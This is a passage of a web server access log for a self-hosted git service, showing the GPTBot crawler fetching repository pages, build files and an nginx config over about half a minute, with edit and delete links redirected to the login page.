"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:28:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14722] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:28:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:28:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10870] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build" +[17/Feb/2026:14:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/daily" [Client 74.7.227.38] [Length 8384] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/activity" +[17/Feb/2026:14:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py" +[17/Feb/2026:14:28:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 626314] [Gzip 15.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:14:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10851] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:14:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 11874] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:14:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10276] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" +[17/Feb/2026:14:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" +[17/Feb/2026:14:28:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2f.gitignore" [Client 74.7.227.38] [Length 23318] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore" +[17/Feb/2026:14:28:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:28:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/html/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:14:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/html/README.md" +[17/Feb/2026:14:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14154] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11140] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21331] [Gzip 6.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11297] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:28:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11871] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:28:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf" +[17/Feb/2026:14:28:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/nginx-reverse-proxy.conf" +[17/Feb/2026:14:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71826] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:14:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14720] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:28:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf" +[17/Feb/2026:14:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/nginx-reverse-proxy.conf" +[17/Feb/2026:14:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10849] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:14:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 11228] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf" +[17/Feb/2026:14:28:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:28:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31163] [Gzip 11.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:28:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10225] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:28:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10658] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:29:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:29:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9994] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10237] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11063] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:29:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:29:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 153441] [Gzip 15.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:29:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:29:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/nginx-reverse-proxy.conf" +[17/Feb/2026:14:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/nginx-reverse-proxy.conf" +[17/Feb/2026:14:29:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/nginx-reverse-proxy.conf" +[17/Feb/2026:14:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/nginx-reverse-proxy.conf" +[17/Feb/2026:14:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf" +[17/Feb/2026:14:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr 